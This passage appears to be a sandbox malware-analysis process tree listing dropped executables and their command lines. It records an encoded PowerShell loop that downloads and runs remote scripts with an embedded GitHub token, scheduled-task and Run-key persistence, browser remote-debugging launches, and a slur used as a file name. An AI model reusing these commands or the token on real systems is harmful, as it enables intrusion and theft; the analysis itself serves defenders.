    "C:\Users\Admin\AppData\Local\Temp\a\raw_cbot.exe"
    3⤵
    PID:9960
- - C:\Users\Admin\AppData\Local\Temp\a\crypted.exe
    "C:\Users\Admin\AppData\Local\Temp\a\crypted.exe"
    3⤵
    PID:10900
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:12836
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        
        PID:8592
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd4,0x108,0x7ff81007dcf8,0x7ff81007dd04,0x7ff81007dd10
        6⤵
        
        PID:11068
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1544,i,5600238882597375635,3853494199807507602,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2564 /prefetch:3
        6⤵
        
        PID:11904
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2516,i,5600238882597375635,3853494199807507602,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2512 /prefetch:2
        6⤵
        
        PID:13464
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2052,i,5600238882597375635,3853494199807507602,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2628 /prefetch:8
        6⤵
        
        PID:13472
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3212,i,5600238882597375635,3853494199807507602,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3296 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:11168
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3220,i,5600238882597375635,3853494199807507602,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3316 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:11124
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4204,i,5600238882597375635,3853494199807507602,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4228 /prefetch:2
        6⤵
        Uses browser remote debugging
        
        PID:13736
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4588,i,5600238882597375635,3853494199807507602,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4600 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:8836
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5152,i,5600238882597375635,3853494199807507602,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5156 /prefetch:8
        6⤵
        
        PID:4968
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        
        PID:3248
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x2f8,0x7ff80feff208,0x7ff80feff214,0x7ff80feff220
        6⤵
        
        PID:13288
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1828,i,8652525909853292351,8247228112006521528,262144 --variations-seed-version --mojo-platform-channel-handle=2656 /prefetch:3
        6⤵
        
        PID:12628
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2560,i,8652525909853292351,8247228112006521528,262144 --variations-seed-version --mojo-platform-channel-handle=2556 /prefetch:2
        6⤵
        
        PID:10072
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2144,i,8652525909853292351,8247228112006521528,262144 --variations-seed-version --mojo-platform-channel-handle=3032 /prefetch:8
        6⤵
        
        PID:6340
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3496,i,8652525909853292351,8247228112006521528,262144 --variations-seed-version --mojo-platform-channel-handle=3532 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:11384
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3516,i,8652525909853292351,8247228112006521528,262144 --variations-seed-version --mojo-platform-channel-handle=3544 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:6532
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5000,i,8652525909853292351,8247228112006521528,262144 --variations-seed-version --mojo-platform-channel-handle=5112 /prefetch:8
        6⤵
        
        PID:14420
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5048,i,8652525909853292351,8247228112006521528,262144 --variations-seed-version --mojo-platform-channel-handle=5136 /prefetch:8
        6⤵
        
        PID:13664
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5200,i,8652525909853292351,8247228112006521528,262144 --variations-seed-version --mojo-platform-channel-handle=5172 /prefetch:8
        6⤵
        
        PID:13080
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        
        PID:6932
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        
        PID:16732
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x2f4,0x7ff80ff0f208,0x7ff80ff0f214,0x7ff80ff0f220
        6⤵
        
        PID:8736
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=3000,i,2259653184437818606,4958809107223929218,262144 --variations-seed-version --mojo-platform-channel-handle=2996 /prefetch:3
        6⤵
        
        PID:17392
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2728,i,2259653184437818606,4958809107223929218,262144 --variations-seed-version --mojo-platform-channel-handle=2724 /prefetch:2
        6⤵
        
        PID:14056
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1776,i,2259653184437818606,4958809107223929218,262144 --variations-seed-version --mojo-platform-channel-handle=3044 /prefetch:8
        6⤵
        
        PID:14304
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3560,i,2259653184437818606,4958809107223929218,262144 --variations-seed-version --mojo-platform-channel-handle=3616 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:8740
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3552,i,2259653184437818606,4958809107223929218,262144 --variations-seed-version --mojo-platform-channel-handle=3608 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:1360
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\ymo8g" & exit
        5⤵
        
        PID:8676
- - C:\Users\Admin\AppData\Local\Temp\a\fileless.exe
    "C:\Users\Admin\AppData\Local\Temp\a\fileless.exe"
    3⤵
    PID:12860
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w 1 -NoExit -encoded dwBoAGkAbABlACAAKAAnAFQAcgB1AGUAJwApACAAewB0AHIAeQAgAHsASQBFAFgAKABJAFcAUgAgACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBJAHMAZABhAE0AMQAyADMANAA1ADYALwBzAGUAYwAvAHIAZQBmAHMALwBoAGUAYQBkAHMALwBtAGEAaQBuAC8AZQBuAHQAcgB5ACcAIAAtAEgAZQBhAGQAZQByAHMAIABAAHsAQQB1AHQAaABvAHIAaQB6AGEAdABpAG8AbgAgAD0AIAAnAHQAbwBrAGUAbgAgAGcAaABwAF8AegBXAHMAZAA0AEMAMgBTADQAWABaAGwAbQBXAGEAMwBWAHUANgBUAGMATwBjAHkAQgBEAFAAeQBjAHAAMwBGAEkAMwBWADcAJwB9ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApAC4AQwBvAG4AdABlAG4AdAAgADsAIABJAEUAWAAoAEkAVwBSACAAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvAEkAcwBkAGEATQAxADIAMwA0ADUANgAvAHMAZQBjAC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBsAG8AYwBhAGwAYQBkAGQAcgBlAHMAcwAnACAALQBIAGUAYQBkAGUAcgBzACAAQAB7AEEAdQB0AGgAbwByAGkAegBhAHQAaQBvAG4AIAA9ACAAJwB0AG8AawBlAG4AIABnAGgAcABfAHoAVwBzAGQANABDADIAUwA0AFgAWgBsAG0AVwBhADMAVgB1ADYAVABjAE8AYwB5AEIARABQAHkAYwBwADMARgBJADMAVgA3ACcAfQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAKQAuAEMAbwBuAHQAZQBuAHQAfQAgAGMAYQB0AGMAaAAgAHsAfQAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgADUAIAB9AA==
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:11700
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -NoExit -encoded dwBoAGkAbABlACAAKAAnAFQAcgB1AGUAJwApACAAewB0AHIAeQAgAHsASQBFAFgAKABJAFcAUgAgACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBJAHMAZABhAE0AMQAyADMANAA1ADYALwBzAGUAYwAvAHIAZQBmAHMALwBoAGUAYQBkAHMALwBtAGEAaQBuAC8AZQBuAHQAcgB5ACcAIAAtAEgAZQBhAGQAZQByAHMAIABAAHsAQQB1AHQAaABvAHIAaQB6AGEAdABpAG8AbgAgAD0AIAAnAHQAbwBrAGUAbgAgAGcAaABwAF8AegBXAHMAZAA0AEMAMgBTADQAWABaAGwAbQBXAGEAMwBWAHUANgBUAGMATwBjAHkAQgBEAFAAeQBjAHAAMwBGAEkAMwBWADcAJwB9ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApAC4AQwBvAG4AdABlAG4AdAAgADsAIABJAEUAWAAoAEkAVwBSACAAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvAEkAcwBkAGEATQAxADIAMwA0ADUANgAvAHMAZQBjAC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBsAG8AYwBhAGwAYQBkAGQAcgBlAHMAcwAnACAALQBIAGUAYQBkAGUAcgBzACAAQAB7AEEAdQB0AGgAbwByAGkAegBhAHQAaQBvAG4AIAA9ACAAJwB0AG8AawBlAG4AIABnAGgAcABfAHoAVwBzAGQANABDADIAUwA0AFgAWgBsAG0AVwBhADMAVgB1ADYAVABjAE8AYwB5AEIARABQAHkAYwBwADMARgBJADMAVgA3ACcAfQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAKQAuAEMAbwBuAHQAZQBuAHQAfQAgAGMAYQB0AGMAaAAgAHsAfQAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgADUAIAB9AA==
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1300
- - C:\Users\Admin\AppData\Local\Temp\a\meter.exe
    "C:\Users\Admin\AppData\Local\Temp\a\meter.exe"
    3⤵
    PID:8896
- - C:\Users\Admin\AppData\Local\Temp\a\csl.exe
    "C:\Users\Admin\AppData\Local\Temp\a\csl.exe"
    3⤵
    PID:9792
- - C:\Users\Admin\AppData\Local\Temp\a\PsExec.exe
    "C:\Users\Admin\AppData\Local\Temp\a\PsExec.exe"
    3⤵
    PID:11756
- - C:\Users\Admin\AppData\Local\Temp\a\Quas13k.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Quas13k.exe"
    3⤵
    PID:9048
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "MicrosoftQuasUpdate" /sc ONLOGON /tr "C:\Windows\system32\explorer\explorer.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:10828
  - - C:\Windows\system32\explorer\explorer.exe
      "C:\Windows\system32\explorer\explorer.exe"
      4⤵
      PID:13000
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "MicrosoftQuasUpdate" /sc ONLOGON /tr "C:\Windows\system32\explorer\explorer.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:13668
- - C:\Users\Admin\AppData\Local\Temp\a\c2new.exe
    "C:\Users\Admin\AppData\Local\Temp\a\c2new.exe"
    3⤵
    PID:9668
- - C:\Users\Admin\AppData\Local\Temp\a\taskhostw.exe
    "C:\Users\Admin\AppData\Local\Temp\a\taskhostw.exe"
    3⤵
    PID:9940
- - C:\Users\Admin\AppData\Local\Temp\a\wnsc.exe
    "C:\Users\Admin\AppData\Local\Temp\a\wnsc.exe"
    3⤵
    PID:12496
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd" /c ping 127.0.0.1 -n 67 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Windows Update.exe" /t REG_SZ /d "C:\Users\Admin\Windows Update.exe"
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      PID:14324
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 67
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:9180
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd" /c ping 127.0.0.1 -n 67 > nul && copy "C:\Users\Admin\AppData\Local\Temp\a\wnsc.exe" "C:\Users\Admin\Windows Update.exe" && ping 127.0.0.1 -n 67 > nul && "C:\Users\Admin\Windows Update.exe"
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      PID:6532
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 67
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:13508
- - C:\Users\Admin\AppData\Local\Temp\a\csrss.exe
    "C:\Users\Admin\AppData\Local\Temp\a\csrss.exe"
    3⤵
    PID:13344
- - C:\Users\Admin\AppData\Local\Temp\a\M7XQmz2DgtiyE3f.exe
    "C:\Users\Admin\AppData\Local\Temp\a\M7XQmz2DgtiyE3f.exe"
    3⤵
    PID:13512
  - - C:\Users\Admin\AppData\Local\Temp\a\M7XQmz2DgtiyE3f.exe
      "C:\Users\Admin\AppData\Local\Temp\a\M7XQmz2DgtiyE3f.exe"
      4⤵
      PID:14108
- - C:\Users\Admin\AppData\Local\Temp\a\thunderbird.exe
    "C:\Users\Admin\AppData\Local\Temp\a\thunderbird.exe"
    3⤵
    PID:1004
  - - C:\Users\Admin\AppData\Local\Temp\a\thunderbird.exe
      "C:\Users\Admin\AppData\Local\Temp\a\thunderbird.exe"
      4⤵
      PID:11384
- - C:\Users\Admin\AppData\Local\Temp\a\hp.exe
    "C:\Users\Admin\AppData\Local\Temp\a\hp.exe"
    3⤵
    PID:8344
- - C:\Users\Admin\AppData\Local\Temp\a\pivo.exe
    "C:\Users\Admin\AppData\Local\Temp\a\pivo.exe"
    3⤵
    PID:9108
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 9108 -s 672
      4⤵
      Program crash
      PID:11488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\nigga.exe"
1⤵
PID:6644
- C:\Users\Admin\AppData\Local\Temp\nigga.exe
  C:\Users\Admin\AppData\Local\Temp\nigga.exe
  2⤵
  PID:6448
- - C:\Windows\SysWOW64\schtasks.exe
    "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\nigga.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:10940
- - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
    "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
    3⤵
    PID:11020
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:11744
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\umzeMY0Aj6Cw.bat" "
      4⤵
      PID:9308
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        5⤵
        
        PID:11780
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:14080
    - - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        5⤵
        
        PID:14668
      - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:14432
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Z5UDD0kuYFvJ.bat" "
        6⤵
        
        PID:10756
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        7⤵
        
        PID:14360
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:7180
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        7⤵
        
        PID:10276

C:\Users\Admin\AppData\Local\Temp\setup-11042237631.exe
C:\Users\Admin\AppData\Local\Temp\\setup-11042237631.exe
1⤵
PID:5876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\javaw.exe
1⤵
PID:6296
- C:\Users\Admin\AppData\Roaming\javaw.exe
  C:\Users\Admin\AppData\Roaming\javaw.exe
  2⤵
  PID:7460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6444 -ip 6444
1⤵
PID:312

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
1⤵
PID:5680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2992 -ip 2992
1⤵
PID:300

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:7020
- C:\Users\Admin\dane\0a-PORNOSKI.exe
  C:\Users\Admin\dane\0a-PORNOSKI.exe
  2⤵
  PID:2020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:5920

C:\Users\Admin\dane\0a-PORNOSKI.exe
C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:7516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
1⤵
PID:6252
- C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
  C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
  2⤵
  PID:8236

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:2104
- C:\Users\Admin\dane\0a-PORNOSKI.exe
  C:\Users\Admin\dane\0a-PORNOSKI.exe
  2⤵
  PID:8272

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:7992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 6736 -ip 6736
1⤵
PID:5112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Filka.exe
1⤵
PID:2672
- C:\Users\Admin\AppData\Roaming\Filka.exe
  C:\Users\Admin\AppData\Roaming\Filka.exe
  2⤵
  PID:9908
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:3372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 7332 -ip 7332
1⤵
PID:8048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 7824 -ip 7824
1⤵
PID:8244

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Userdata\Userdata.exe"
1⤵
PID:8580
- C:\Windows\SysWOW64\Userdata\Userdata.exe
  C:\Windows\SysWOW64\Userdata\Userdata.exe
  2⤵
  PID:12424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 7412 -ip 7412
1⤵
PID:8616

C:\Windows\system32\cmd.exe
